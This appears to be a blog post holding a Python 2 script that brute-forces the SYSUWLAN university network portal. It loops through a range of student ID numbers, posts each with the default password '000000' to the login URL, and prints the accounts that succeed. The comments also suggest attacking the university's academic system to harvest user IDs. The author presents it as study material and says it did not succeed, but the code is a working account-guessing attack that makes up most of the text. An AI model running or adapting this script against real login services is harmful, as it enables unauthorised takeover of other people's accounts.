#try to hack SYSUWLAN,but actually failed.
#Because the user names,that what we call netids,are not easy to get.
#Additionally,the default password is not easy to get.
#But I did some work to analyse the protocal of SYSUWLAN,and to finish the rest,all we need is to get the netids and default password.
#Any hacker who interested in this maybe can start by hack the SYSU JW system.
#All these just are using for study and all right reserved.
#@author:Robin Chen
import sys
reload(sys)
sys.setdefaultencoding('utf8')#encoding=utf8
import requests
import hashlib
###login in url
url = 'http://10.10.2.22/portal/logon.cgi'
#form header
header = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36' }
def md5(str):
m = hashlib.md5()
m.update(str)
return m.hexdigest()
def login(form_data):
s = requests.session()
#request
response = s.post(url,data = form_data,headers = header)
return response.content
def tryAccount(id_start,id_end,default_pass):
#form data
form_data = {'PtUser':'XXXXXX', #user name
'PtPwd':'XXXXXX', #pass word
'PtButton':'Logon',# 需要有用于标记用户登录还是下线的属性”PtButton”,取值为"Logon"表示登录,取值为"Logoff"表示下线。
}
passwd = default_pass#抓包发现密码明文传输,所以无需加密再post
form_data['PtPwd'] = passwd #将密码填入表单
for i in range(id_start,id_end):
form_data['PtUser'] = str(i) #将用户名填入表单
result = login(form_data) #登录,获取返回的 response 结果
if result != 'password_error' and result != 'username_error':
print str(i)+"\t"+result #打印账号、密码正确的学号...
print "\n上网不涉密,涉密不上网"
if __name__ == "__main__":
ID_START = 12212899 #起始学号
ID_END = 13212899 #结束学号
DEFAULT_PASS = "000000" #初始密码
tryAccount(ID_START,ID_END,DEFAULT_PASS)
109
评论
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
查看更多评论
添加红包
